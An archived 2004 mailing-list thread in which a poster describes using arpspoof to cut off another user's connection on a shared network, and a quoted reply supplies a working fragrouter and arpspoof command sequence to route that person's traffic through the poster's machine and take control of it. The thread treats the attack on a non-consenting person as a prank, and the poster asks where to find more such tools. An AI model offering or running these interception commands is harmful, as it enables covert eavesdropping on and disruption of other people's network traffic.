Re: interesting comparison
From: Jesse Woo (jesse_at_itres.org)
Date: 08/17/04
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Date: Tue, 17 Aug 2004 12:11:36 +0800
wally wrote:
> Jesse Woo wrote:
>
>
>>lol, now when I want to do something, I just type "arpspoof -t
>>192.168.1.3 192.168.1.1" in the terminal, then he really can do nothing,
>>and he just don't know what goes wrong. it's very insteresing. : )
>>
>>Jesse Woo
>
>
> It's neat :) but i wouldnt call that a fix for the problem LOL.
>
> If you want his internet connection tunneled through your computer so that you are in
> control of it you can also do:
>
> su
> pkg_add -r fragrouter
> fragrouter -B1 &
> arpspoof -t hisip routerip &
> arpspoof -t routerip hisip
>
> This will make his traffic come to your computer, from where get properly routed so his
> connection will seem undisturbed. however you will have control over his traffic.
>
> I would still look into the router's setup though.
>
I think so too, but does that affect my connection? and where can I find
such a lot useful network toolkits? and how do you do that? or just
exploring in ports?
Thanks
Jesse
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